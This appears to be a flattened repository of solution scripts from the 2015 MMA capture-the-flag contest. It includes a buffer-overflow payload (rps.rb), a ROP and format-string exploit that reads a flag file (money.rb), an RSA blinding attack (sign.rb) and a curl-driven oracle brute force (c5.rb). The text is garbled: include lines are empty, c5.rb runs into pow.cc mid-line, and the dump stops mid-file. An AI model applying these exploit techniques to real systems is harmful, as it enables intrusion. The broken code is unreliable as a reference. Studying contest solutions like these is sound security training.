├── README.md ├── cannotberun.rb ├── c2.rb ├── rps.rb ├── splitted.rb ├── c4.rb ├── Makefile ├── c5.rb ├── pow.cc ├── sign.rb ├── gen_q_i.rb ├── howtouse.rb ├── qr2txt.cc ├── pat.cc ├── nagoya.cc ├── dc.rb ├── pm.rb ├── pat3.cc ├── alpha.rb ├── money.rb ├── ctfutils.rb ├── sh.c └── howtouse.dmp /README.md: -------------------------------------------------------------------------------- 1 | # mma-ctf-2015 2 | -------------------------------------------------------------------------------- /cannotberun.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | c = File.read('cannotberun.exe') 6 | c[0x3c] = 0xe8.chr 7 | 8 | print c 9 | -------------------------------------------------------------------------------- /c2.rb: -------------------------------------------------------------------------------- 1 | c = '36 36 2a 64 4b 4b 4a 21 1e 4b 1f 20 1f 21 4d 4b 1b 1d 19 4f 21 4c 1d 4a 4e 1c 4c 1b 22 4f 22 22 1b 21 4c 20 1d 4f 1f 4c 4a 19 22 1a 66' 2 | 3 | c.split.each do |v| 4 | v = v.hex 5 | if v >= 0x0 && v <= 0x99 6 | putc (v - 0x2a + 'A'.ord).chr 7 | else 8 | putc '?' 9 | end 10 | end 11 | 12 | -------------------------------------------------------------------------------- /rps.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | if $prod 6 | pipe = TCPSocket.open('milkyway.chal.mmactf.link', 1641) 7 | else 8 | pipe = popen('./rps') 9 | end 10 | 11 | c = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzab' + [0x601000+0x54].pack('Q') + [0x4008b4].pack('Q') 12 | 13 | pipe.puts c 14 | pipe.puts 'r' 15 | 16 | pipe.interactive 17 | -------------------------------------------------------------------------------- /splitted.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | buf = ' ' * 3745 6 | 7 | pcap = File.read('splitted/splitted.pcap') 8 | reg = Regexp.new("Partial Content\\s+.*?Content-Length: (\\d+).*?Content-Range: bytes (\\d+)-(\\d+).*?\r\n\r\n".encode("ASCII-8BIT"), Regexp::MULTILINE) 9 | pcap.scan(reg) do 10 | len = $1.to_i 11 | st = $2.to_i 12 | ed = $3.to_i 13 | #buf = buf[0,st] + $'[0,len] + buf[ed..-1] 14 | buf[st,len] = $'[0,len] 15 | end 16 | 17 | print buf 18 | -------------------------------------------------------------------------------- /c4.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | c = 'e3 e3 83 21 33 96 23 43 ef 9a 9a 05 18 c7 23 07 07 07 c7 9a 04 33 23 07 23 ef 12 c7 04 96 43 23 23 18 04 04 05 c7 fb 18 96 43 ef 43 ff' 4 | 5 | tbl = '04 c7 23 c3 18 96 05 9a 07 12 83 2c 1a 1b 6e 5a a0 52 3b d6 b3 29 e3 2f 84 53 d1 00 ed 20 fc b1 5b 6a cb be ef aa fb 43 4d 33 85 45 f9 02 7f 50 3c 9f a8 51 a3 40 8f 92 9d 38 f5 bc b6 da'.split 6 | 7 | a = [*'0'..'9'] + [*'A'..'Z'] + [*'a'..'z'] 8 | 9 | c.split.each do |v| 10 | i = tbl.index(v) 11 | if i 12 | putc a[i] 13 | else 14 | putc '?' 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: pat pat3 sh nagoya qr2txt pow 2 | 3 | pow: pow.cc 4 | $(CXX) -o $@ $< -g -O -lssl -lcrypto 5 | 6 | pat: pat.cc 7 | $(CXX) -o $@ $< -g -O 8 | 9 | qr2txt: qr2txt.cc 10 | $(CXX) -o $@ $< -g -O -lSDL `sdl-config --cflags` 11 | 12 | pat2: pat2.cc 13 | $(CXX) -o $@ $< -g -O -std=c++11 14 | 15 | pat3: pat3.cc 16 | $(CXX) -o $@ $< -g -O -std=c++11 17 | 18 | nagoya: nagoya.cc 19 | $(CXX) -o $@ $< -g -O -std=c++11 -lSDL `sdl-config --cflags` 20 | 21 | sh: sh.c 22 | $(CC) -o $@ $< -g -O -m32 -ldl -Wl,-Ttext-segment=0x2000000 23 | 24 | howtouse: howtouse.cc 25 | $(CXX) -o $@ $< -g -O -m32 26 | -------------------------------------------------------------------------------- /c5.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | c = '60 00 0c 3a 1e 52 02 53 02 51 0c 5d 56 51 5a 5f 5f 5a 51 00 05 53 56 0a 5e 00 52 05 03 51 50 55 03 04 52 04 0f 0f 54 52 57 03 52 04 4e'.split 6 | 7 | a = [*'0'..'9'] + [*'a'..'f'] 8 | 9 | d = 'MMA{e000000000000000000000000000000000000000}' 10 | n = 5 11 | while d[n] != '}' 12 | a.each do |ch| 13 | d[n] = ch 14 | resp = `curl -d 's=#{d}' http://bow.chal.mmactf.link/~scs/crypt5.cgi 2> /dev/null` 15 | r = resp[/\/h1>(.*?) 2 | #include 3 | 4 | #include 5 | 6 | static const int N = 6; 7 | 8 | int main(int argc, char* argv[]) { 9 | SHA_CTX ctx; 10 | SHA1_Init(&ctx); 11 | SHA1_Update(&ctx, argv[1], strlen(argv[1])); 12 | 13 | int M = 1; 14 | for (int i = 0; i < N; i++) 15 | M *= 26; 16 | 17 | char buf[99] = {}; 18 | unsigned char md[21]; 19 | for (int i = 0; i < M; i++) { 20 | int v = i; 21 | for (int j = 0; j < N; j++) { 22 | buf[j] = 'a' + v % 26; 23 | v /= 26; 24 | } 25 | 26 | SHA_CTX c = ctx; 27 | SHA1_Update(&c, buf, N); 28 | SHA1_Final(md, &c); 29 | if (!memcmp(md, "\x12\x34\x56", 3)) { 30 | puts(buf); 31 | break; 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /sign.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | r = 3 6 | e = 65537 7 | 8 | n = 167891001700388890587843249700549749388526432049480469518286617353920544258774519927209158925778143308323065254691520342763823691453238628056767074647261280532853686188135635704146982794597383205258532849509382400026732518927013916395873932058316105952437693180982367272310066869071042063581536335953290566509 9 | 10 | pipe = popen('nc cry1.chal.mmactf.link 44816') 11 | pipe.get 12 | pipe.get 13 | pipe.get 14 | m = pipe.get.to_i 15 | 16 | STDERR.puts "m=#{m}" 17 | 18 | md = (r ** e * m) % n 19 | 20 | pipe2 = popen('nc cry1.chal.mmactf.link 44815') 21 | pipe2.puts md 22 | sd = pipe2.get.to_i 23 | 24 | s = (sd * invmod(r, n)) % n 25 | 26 | pipe.puts s 27 | 28 | pipe.interactive 29 | -------------------------------------------------------------------------------- /gen_q_i.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | code_size = 41 4 | 5 | cc = '' 6 | 7 | cc += "##{code_size}" 8 | t = "#35.:\\,#1-:!!#" 9 | cc += t + "#{t.size+5}*~@_" 10 | 11 | #cc += "##{code_size}" 12 | #t = "#35.#1-:,#92.#35.#35,#46.#44.:!!#" 13 | #cc += t + "#{t.size+5}*~@_" 14 | 15 | cc += "##{code_size}" 16 | t = "#1-^.:!!#" 17 | cc += t + "#{t.size+5}*~@;" 18 | 19 | code = cc 20 | if code.size > code_size 21 | raise 22 | end 23 | while code.size < code_size 24 | code += ' ' 25 | end 26 | 27 | c = '' 28 | d = '' 29 | 30 | code.reverse.each_byte{|b| 31 | raise if b == 0 32 | d += "##{b}" 33 | } 34 | c += d 35 | 36 | #code_size.times{|i| 37 | # c += "##{code_size-i-1}" 38 | # c += "\\" 39 | # c += "#35.," 40 | #} 41 | 42 | #c += cc 43 | 44 | print c + code 45 | 46 | __END__ 47 | 48 | code = 'dc' 49 | 50 | c = '#0' 51 | d = '' 52 | code.each_byte{|b| 53 | d += "##{b}^:#999*@^#35.," 54 | } 55 | 56 | puts c + d + code 57 | 58 | __END__ 59 | 60 | code = '__:!#99*@#35.,dc' 61 | 62 | c = '#1' 63 | d = '' 64 | 65 | code.reverse.each_byte{|b| 66 | d += "##{b}^" 67 | } 68 | 69 | c += d 70 | c += "#^#^##{d.size+10}*~" 71 | c += "@" 72 | 73 | puts c + code 74 | -------------------------------------------------------------------------------- /howtouse.rb: -------------------------------------------------------------------------------- 1 | dmp = %q(0xffffcd9c: 0xf7d12f5b 0x00000000 0x00000000 0x10001080 2 | 0xffffcdac: 0x10001080 0x10001070 0x10001110 0x10001060 3 | 0xffffcdbc: 0x10001030 0x100010e0 0x10001040 0x10001100 4 | 0xffffcdcc: 0x10001090 0x10001030 0x10001010 0x10001090 5 | 0xffffcddc: 0x10001090 0x100010a0 0x10001060 0x10001030 6 | 0xffffcdec: 0x100010f0 0x100010e0 0x100010a0 0x100010b0 7 | 0xffffcdfc: 0x100010d0 0x10001100 0x100010e0 0x10001040 8 | 0xffffce0c: 0x100010f0 0x100010f0 0x10001040 0x10001100 9 | 0xffffce1c: 0x10001050 0x10001050 0x100010e0 0x10001050 10 | 0xffffce2c: 0x10001060 0x10001010 0x10001100 0x10001050 11 | 0xffffce3c: 0x10001100 0x10001020 0x100010c0 0x100010b0 12 | 0xffffce4c: 0x10001050 0x10001040 0x100010f0 0x10001120) 13 | 14 | c = File.read('howtouse.dmp') 15 | 16 | dmp.split[4..-1].each do |d| 17 | next if d =~ /:/ 18 | d.sub!(/0x/, '') 19 | ch = c[/#{d}:\s+.*?mov\s+\$0x(\h+),/, 1] 20 | raise d if !ch 21 | putc ch.hex 22 | end 23 | 24 | 25 | -------------------------------------------------------------------------------- /qr2txt.cc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | Uint32 getpixel(SDL_Surface *surface, int x, int y) { 4 | int bpp = surface->format->BytesPerPixel; 5 | Uint8 *p = (Uint8 *)surface->pixels + y * surface->pitch + x * bpp; 6 | 7 | switch(bpp) { 8 | case 1: 9 | return *p; 10 | 11 | case 2: 12 | return *(Uint16 *)p; 13 | 14 | case 3: 15 | if(SDL_BYTEORDER == SDL_BIG_ENDIAN) 16 | return p[0] << 16 | p[1] << 8 | p[2]; 17 | else 18 | return p[0] | p[1] << 8 | p[2] << 16; 19 | case 4: 20 | return *(Uint32 *)p; 21 | 22 | default: 23 | return 0; 24 | } 25 | } 26 | 27 | void putpixel(SDL_Surface *surface, int x, int y, Uint32 pixel) { 28 | int bpp = surface->format->BytesPerPixel; 29 | Uint8 *p = (Uint8 *)surface->pixels + y * surface->pitch + x * bpp; 30 | 31 | switch(bpp) { 32 | case 1: 33 | *p = pixel; 34 | break; 35 | 36 | case 2: 37 | *(Uint16 *)p = pixel; 38 | break; 39 | 40 | case 3: 41 | if(SDL_BYTEORDER == SDL_BIG_ENDIAN) { 42 | p[0] = (pixel >> 16) & 0xff; 43 | p[1] = (pixel >> 8) & 0xff; 44 | p[2] = pixel & 0xff; 45 | } else { 46 | p[0] = pixel & 0xff; 47 | p[1] = (pixel >> 8) & 0xff; 48 | p[2] = (pixel >> 16) & 0xff; 49 | } 50 | break; 51 | 52 | case 4: 53 | *(Uint32 *)p = pixel; 54 | break; 55 | } 56 | } 57 | 58 | int main() { 59 | SDL_Init(SDL_INIT_VIDEO); 60 | SDL_Surface* s = SDL_LoadBMP("qr.bmp"); 61 | 62 | for (int y = 0; y < s->h; y+=8) { 63 | for (int x = 0; x < s->w; x+=8) { 64 | Uint32 p = getpixel(s, x, y); 65 | Uint8 r, g, b; 66 | SDL_GetRGB(p, s->format, &r, &g, &b); 67 | int v = (r + g + b) / 2; 68 | if (v > 200) 69 | printf("_"); 70 | else if (v > 50) 71 | printf("?"); 72 | else 73 | printf("X"); 74 | } 75 | puts(""); 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /pat.cc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | using namespace std; 8 | 9 | static const int N = 3; 10 | 11 | int POS(int x, int y) { 12 | return x + y * N; 13 | } 14 | 15 | int X(int p) { 16 | return p % N; 17 | } 18 | 19 | int Y(int p) { 20 | return p / N; 21 | } 22 | 23 | int sign(int v) { 24 | return v > 0 ? 1 : v < 0 ? -1 : 0; 25 | } 26 | 27 | struct State { 28 | int pos; 29 | vector route; 30 | 31 | bool has(int i) const { 32 | return find(route.begin(), route.end(), i) != route.end(); 33 | } 34 | }; 35 | 36 | int main() { 37 | queue q; 38 | for (int i = 0; i < N * N; i++) { 39 | State st; 40 | st.pos = i; 41 | st.route.push_back(i); 42 | q.push(st); 43 | } 44 | 45 | int cnt = 0; 46 | while (!q.empty()) { 47 | State st = q.front(); 48 | q.pop(); 49 | if (st.route.size() >= 4) 50 | cnt++; 51 | 52 | int px = X(st.pos); 53 | int py = Y(st.pos); 54 | for (int i = 0; i < N * N; i++) { 55 | int x = X(i); 56 | int y = Y(i); 57 | int sx = x - px; 58 | int sy = y - py; 59 | int dx = abs(sx); 60 | int dy = abs(sy); 61 | 62 | if (dx == 0 && dy == 0) 63 | continue; 64 | 65 | if (dx == 0 && dy != 1 || 66 | dy == 0 && dx != 1 || 67 | dx == dy && dx != 1) { 68 | bool ok = true; 69 | int cx = px; 70 | int cy = py; 71 | while (true) { 72 | cx += sign(sx); 73 | cy += sign(sy); 74 | if (cx == x && cy == y) 75 | break; 76 | if (!st.has(POS(cx, cy))) { 77 | ok = false; 78 | break; 79 | } 80 | } 81 | if (!ok) 82 | continue; 83 | } 84 | 85 | if (st.has(i)) 86 | continue; 87 | 88 | State nst = st; 89 | nst.pos = i; 90 | nst.route.push_back(i); 91 | q.push(nst); 92 | } 93 | } 94 | 95 | printf("%d\n", cnt); 96 | } 97 | -------------------------------------------------------------------------------- /nagoya.cc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | Uint32 getpixel(SDL_Surface *surface, int x, int y) { 4 | int bpp = surface->format->BytesPerPixel; 5 | Uint8 *p = (Uint8 *)surface->pixels + y * surface->pitch + x * bpp; 6 | 7 | switch(bpp) { 8 | case 1: 9 | return *p; 10 | 11 | case 2: 12 | return *(Uint16 *)p; 13 | 14 | case 3: 15 | if(SDL_BYTEORDER == SDL_BIG_ENDIAN) 16 | return p[0] << 16 | p[1] << 8 | p[2]; 17 | else 18 | return p[0] | p[1] << 8 | p[2] << 16; 19 | case 4: 20 | return *(Uint32 *)p; 21 | 22 | default: 23 | return 0; 24 | } 25 | } 26 | 27 | void putpixel(SDL_Surface *surface, int x, int y, Uint32 pixel) { 28 | int bpp = surface->format->BytesPerPixel; 29 | Uint8 *p = (Uint8 *)surface->pixels + y * surface->pitch + x * bpp; 30 | 31 | switch(bpp) { 32 | case 1: 33 | *p = pixel; 34 | break; 35 | 36 | case 2: 37 | *(Uint16 *)p = pixel; 38 | break; 39 | 40 | case 3: 41 | if(SDL_BYTEORDER == SDL_BIG_ENDIAN) { 42 | p[0] = (pixel >> 16) & 0xff; 43 | p[1] = (pixel >> 8) & 0xff; 44 | p[2] = pixel & 0xff; 45 | } else { 46 | p[0] = pixel & 0xff; 47 | p[1] = (pixel >> 8) & 0xff; 48 | p[2] = (pixel >> 16) & 0xff; 49 | } 50 | break; 51 | 52 | case 4: 53 | *(Uint32 *)p = pixel; 54 | break; 55 | } 56 | } 57 | 58 | int main() { 59 | SDL_Init(SDL_INIT_VIDEO); 60 | SDL_Surface* s = SDL_LoadBMP("nagoya.bmp"); 61 | SDL_Surface* o = SDL_CreateRGBSurface(SDL_SWSURFACE, s->w, s->h, 32, 62 | 0, 0, 0, 0); 63 | 64 | for (int y = 0; y < s->h; y++) { 65 | for (int x = 0; x < s->w; x++) { 66 | Uint32 p = getpixel(s, x, y); 67 | //printf("%d %d %u\n", x, y, p&1); 68 | if (p & 1) { 69 | putpixel(o, x, y, 0xffffffff); 70 | } 71 | } 72 | } 73 | SDL_SaveBMP(o, "out.bmp"); 74 | } 75 | -------------------------------------------------------------------------------- /dc.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # for Digital Circuit 4 | 5 | require './ctfutils' 6 | 7 | def get_c1(v) 8 | res = `vvp ./digital_circuit/program +input=#{$input + v * 2 ** (128+64)}` 9 | res = res.force_encoding('ASCII-8BIT') 10 | if res !~ /\(c1\)=\s*(\d+)/ 11 | raise res 12 | end 13 | $1.to_i 14 | end 15 | 16 | 17 | mul = 0b00000000000000000000000000000000000000000000000000100010010010000100010101001100010011000100111100100001001000010010001000100001 18 | xorv = 0b00001110111000011011000000000101000110001011000101111110100100000111110001100000110010110000100011000101110010000001011110110010 19 | c40 = invmod(mul, 2**128) * xorv % (2**128) 20 | 21 | c20 = 6442758005744298871 * 2**128 22 | 23 | $input = c40 + c20 24 | 25 | base = get_c1(0) 26 | 27 | a = [] 28 | 64.times{ 29 | a << [] 30 | } 31 | 32 | diffs = [] 33 | 34 | STDERR.puts '%b' % base 35 | 64.times{|i| 36 | diff = base ^ get_c1(2 ** i) 37 | diffs << diff 38 | 39 | d = diff 40 | j = 0 41 | while d != 0 42 | if d % 2 == 1 43 | a[j] << i 44 | end 45 | d >>= 1 46 | j += 1 47 | end 48 | } 49 | 50 | STDERR.puts a.inspect 51 | STDERR.puts diffs.inspect 52 | 53 | c10 = 0 54 | 55 | c = base 56 | 64.times{|b| 57 | if a[b].size != 1 58 | raise 59 | end 60 | 61 | if a[b][0] != b 62 | raise 63 | end 64 | 65 | if (c >> b) % 2 == 1 66 | STDERR.puts "#{b} #{1< 2 | #include 3 | #include 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | using namespace std; 12 | 13 | static const int N = 4; 14 | 15 | int POS(int x, int y) { 16 | return x + y * N; 17 | } 18 | 19 | int X(int p) { 20 | return p % N; 21 | } 22 | 23 | int Y(int p) { 24 | return p / N; 25 | } 26 | 27 | int sign(int v) { 28 | return v > 0 ? 1 : v < 0 ? -1 : 0; 29 | } 30 | 31 | struct State { 32 | int pos; 33 | int done; 34 | double len; 35 | 36 | State() { 37 | pos = -1; 38 | done = 0; 39 | len = 0; 40 | } 41 | 42 | void set(int p) { 43 | pos = p; 44 | done |= 1 << p; 45 | } 46 | 47 | bool has(int i) const { 48 | return (done >> i) & 1; 49 | } 50 | 51 | int id() const { 52 | return done * 16 + pos; 53 | } 54 | }; 55 | 56 | int main(int argc, char* argv[]) { 57 | queue q; 58 | 59 | { 60 | int i = atoi(argv[1]); 61 | State st; 62 | st.set(i); 63 | q.push(st); 64 | } 65 | 66 | map done; 67 | 68 | double max_len = 0; 69 | int cnt = 0; 70 | while (!q.empty()) { 71 | State st = q.front(); 72 | q.pop(); 73 | 74 | auto p = done.emplace(st.id(), st.len); 75 | if (!p.second) { 76 | if (p.first->second > st.len) 77 | continue; 78 | p.first->second = st.len; 79 | } 80 | 81 | if (max_len < st.len) { 82 | max_len = st.len; 83 | fprintf(stderr, "max=%f cnt=%d\n", max_len, cnt); 84 | } 85 | cnt++; 86 | 87 | int px = X(st.pos); 88 | int py = Y(st.pos); 89 | for (int i = 0; i < N * N; i++) { 90 | int x = X(i); 91 | int y = Y(i); 92 | int sx = x - px; 93 | int sy = y - py; 94 | int dx = abs(sx); 95 | int dy = abs(sy); 96 | 97 | if (dx == 0 && dy == 0) 98 | continue; 99 | 100 | if (dx == 0 && dy != 1 || 101 | dy == 0 && dx != 1 || 102 | dx == dy && dx != 1) { 103 | bool ok = true; 104 | int cx = px; 105 | int cy = py; 106 | while (true) { 107 | cx += sign(sx); 108 | cy += sign(sy); 109 | if (cx == x && cy == y) 110 | break; 111 | if (!st.has(POS(cx, cy))) { 112 | ok = false; 113 | break; 114 | } 115 | } 116 | if (!ok) 117 | continue; 118 | } 119 | 120 | if (st.has(i)) 121 | continue; 122 | 123 | State nst(st); 124 | nst.set(i); 125 | nst.len += sqrt(dx * dx + dy * dy); 126 | q.push(nst); 127 | } 128 | } 129 | 130 | printf("%d\n", cnt); 131 | } 132 | -------------------------------------------------------------------------------- /alpha.rb: -------------------------------------------------------------------------------- 1 | public 2 | def i n 3 | def each 4 | yield succ end 5 | for r in n 6 | end 7 | r end 8 | def each 9 | clear 10 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 11 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 12 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 13 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 14 | def each 15 | read end 16 | for i in open self 17 | end 18 | i 19 | end 20 | for i in inspect 21 | end 22 | 23 | 24 | __END__ 25 | 26 | class String 27 | def coerce 28 | 32 29 | end 30 | end 31 | 32 | class Integer 33 | def each 34 | p quo "hoge" 35 | end 36 | end 37 | 38 | for i in 40 39 | end 40 | 41 | 42 | class String 43 | alias each bytes end 44 | class A 45 | for A in name 46 | end end 47 | 48 | class String 49 | def each 50 | for c in bytes 51 | case c 52 | when 65 53 | concat 59 54 | when 66 55 | concat 46 56 | when 67 57 | concat 39 58 | when 68 59 | concat 32 60 | else 61 | concat c 62 | end 63 | end 64 | print self 65 | eval self 66 | end 67 | end 68 | 69 | class AputsDFileBreadCflagC 70 | for i in name 71 | end 72 | end 73 | 74 | public 75 | def i n 76 | def each 77 | yield succ end 78 | for r in n 79 | end 80 | r end 81 | 82 | class File 83 | def each 84 | p read 85 | end end 86 | 87 | class String 88 | def each 89 | clear 90 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 91 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 92 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 93 | concat i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i i size 94 | for f in open self 95 | end end end 96 | for i in String nil 97 | end 98 | 99 | 100 | exit 101 | -------------------------------------------------------------------------------- /money.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require './ctfutils' 4 | 5 | if $prod 6 | pipe = TCPSocket.open('pwn1.chal.mmactf.link', 21345) 7 | pipe2 = TCPSocket.open('pwn1.chal.mmactf.link', 21345) 8 | else 9 | pipe = popen('./moneygame_easy') 10 | pipe2 = popen('./moneygame_easy') 11 | end 12 | 13 | log = [] 14 | 54.times{ 15 | s = [] 16 | while true 17 | l = pipe2.get 18 | if l =~ /Stock #(\d): \$(\d+)\.(\d+)/ 19 | s[$1.to_i-1] = $2.to_i * 100 + $3.to_i 20 | if $1.to_i == 3 21 | break 22 | end 23 | end 24 | end 25 | log << s 26 | pipe2.puts 'Rest' 27 | } 28 | 29 | pipe2.close 30 | 31 | strats = [] 32 | 53.times{|w| 33 | 1.upto(53) do |t| 34 | break if !log[w+t] 35 | 36 | prev = log[w] 37 | now = log[w+t] 38 | 39 | 3.times{|i| 40 | if now[i] > prev[i] 41 | d = (now[i].to_f / prev[i] - 1.0) / (t + 1) 42 | strats << [d, w, t, i] 43 | end 44 | } 45 | end 46 | } 47 | 48 | cmds = [nil] * 54 49 | 50 | p strats.size 51 | 52 | strats.sort_by!{|d,*_|-d} 53 | 54 | strats.each do |d, w, t, i| 55 | if !cmds[w,t+1].all?{|c|c==nil} 56 | next 57 | end 58 | 59 | cmds[w] = ['Buy', i] 60 | (w+1).upto(w+t-1){|_|cmds[_] = 'Rest'} 61 | cmds[w+t] = ['Sell', i] 62 | end 63 | 64 | money = 1000000 65 | num = 0 66 | cmds.each_with_index do |c, w| 67 | puts "= week #{w} #{c}" 68 | if !c || c == 'Rest' 69 | pipe.puts c 70 | else 71 | pipe.puts c[0] 72 | pipe.puts c[1] + 1 73 | if c[0] == 'Buy' 74 | num = money / log[w][c[1]] 75 | money -= num * log[w][c[1]] 76 | else 77 | money += num * log[w][c[1]] 78 | end 79 | pipe.puts num 80 | end 81 | end 82 | 83 | puts "Expected: #{money}" 84 | 85 | pipe.wait_until(/What your name\? : /) 86 | 87 | c = '' 88 | 89 | fclose_plt = 0x804a278 90 | fflush_plt = 0x804a270 91 | 92 | pop11_addr = 0x08048d59 93 | #pop11_addr = 0xdeadbeef 94 | 95 | pop4_addr = 0x08048d5c 96 | #pop4_addr = 0xdeadbeef 97 | 98 | call_fopen = 0x8048c61 99 | 100 | flag2_addr = 0x0804a168 + 0xdf0 101 | #flag2_addr = 0x804a2b4 102 | 103 | pop_addr = 0x080484b5 104 | 105 | c = '' 106 | 107 | rop = [0xdeadbeea, 0x0804a168 + 0xe00] 108 | rop += [call_fopen, flag2_addr, 0x8048f50] 109 | rop += [0xdeadbeea, 0xdeadbeeb, 0xdeadbeec, 0xdeadbeed] * 2 110 | 4.times{ 111 | #rop += [0x8048520, 0x080484b5, 0x08048000 + 2768] 112 | rop += [0x8048cbc] 113 | } 114 | rps = rop.size 115 | 116 | c += rop.pack("L*") 117 | 4.times{|i| 118 | #c += [fflush_plt+i].pack("L*") 119 | c += [fclose_plt+i].pack("L*") 120 | } 121 | 6.times{|i| 122 | c += [flag2_addr+i].pack("L*") 123 | } 124 | 125 | pn = c.size 126 | a = pop11_addr 127 | 4.times{|i| 128 | n = a & 0xff 129 | c += "%#{(n-pn)%256}c%#{7+rps+i}$hhn" 130 | a >>= 8 131 | pn = n 132 | } 133 | 134 | #pn = c.size 135 | 6.times{|i| 136 | n = "flag2\0"[i].ord & 0xff 137 | c += "%#{(n-pn)%256}c%#{7+4+rps+i}$hhn" 138 | a >>= 8 139 | pn = n 140 | } 141 | 142 | if c.size > 0x100 143 | puts c.size 144 | raise c 145 | end 146 | 147 | #c += 'X' * 50 148 | 149 | if c.include?("\n") 150 | puts 'fuck' 151 | raise c 152 | end 153 | 154 | 155 | pipe.puts c 156 | File.write('rop', "Rest\n"*54+c) 157 | 158 | #pipe.close_write 159 | 160 | pipe.interactive 161 | -------------------------------------------------------------------------------- /ctfutils.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'io/nonblock' 4 | 5 | require 'socket' 6 | 7 | def File.read(filename) 8 | File.open(filename, 'r:binary') do |f| 9 | f.read 10 | end 11 | end 12 | 13 | def File.write(filename, s) 14 | File.open(filename, 'w:binary') do |f| 15 | f.write(s) 16 | end 17 | end 18 | 19 | def install_io_log_hook(pipe, bn) 20 | log_in = "/tmp/#{bn}.in.log" 21 | log_out = "/tmp/#{bn}.out.log" 22 | File.delete(log_in) if File.exist?(log_in) 23 | File.delete(log_out) if File.exist?(log_out) 24 | orig_gets = pipe.method(:gets) 25 | orig_read = pipe.method(:read) 26 | orig_write = pipe.method(:write) 27 | pipe.define_singleton_method(:gets, proc do |*a| 28 | r = orig_gets[*a] 29 | File.open(log_in, 'a') do |of| 30 | of.write(r) 31 | end 32 | r 33 | end) 34 | pipe.define_singleton_method(:read, proc do |*a| 35 | r = orig_read[*a] 36 | File.open(log_in, 'a') do |of| 37 | of.write(r) 38 | end 39 | r 40 | end) 41 | pipe.define_singleton_method(:write, proc do |*a| 42 | orig_write[*a] 43 | File.open(log_out, 'a') do |of| 44 | of.write(*a) 45 | end 46 | end) 47 | end 48 | 49 | def socket(*a) 50 | s = TCPSocket.new(*a) 51 | install_io_log_hook(s, a*':') 52 | s 53 | end 54 | 55 | def popen(a) 56 | pipe = IO.popen(a, 'r+:binary') 57 | bn = File.basename(a) 58 | install_io_log_hook(pipe, bn) 59 | pipe 60 | end 61 | 62 | class IO 63 | def get(n=nil) 64 | if n 65 | r = read(n) 66 | if !$quiet 67 | STDERR.print(r) 68 | #STDERR.puts ('%02x' * r.size) % r.unpack("c*") 69 | end 70 | r 71 | else 72 | l = gets 73 | STDERR.puts l if !$quiet 74 | l 75 | end 76 | end 77 | 78 | def puts(s) 79 | if s =~ /\n$/ 80 | write(s) 81 | else 82 | write("#{s}\n") 83 | end 84 | flush 85 | end 86 | 87 | def p(*a) 88 | a.each do |s| 89 | puts s.inspect 90 | end 91 | end 92 | 93 | def show_all_buf 94 | while r = IO.select([self], [], [], 0) 95 | if r[0][0] == self 96 | STDERR.putc self.read(1) 97 | end 98 | end 99 | end 100 | 101 | def wait_until(reg) 102 | b = '' 103 | while true 104 | c = self.read(1) 105 | if !$quiet 106 | STDERR.putc c 107 | end 108 | b += c 109 | if reg =~ b 110 | return $~ 111 | end 112 | end 113 | end 114 | 115 | def interactive 116 | STDOUT.puts 'INTERACTIVE!' 117 | begin 118 | while true 119 | r = IO.select([self, STDIN], [], []) 120 | if r[0][0] == self 121 | c = self.read(1) 122 | if c 123 | STDOUT.putc c 124 | else 125 | STDOUT.puts 'Connection closed (read)' 126 | return 127 | end 128 | else r[0][0] == STDIN 129 | input = STDIN.gets 130 | self.puts(input) 131 | end 132 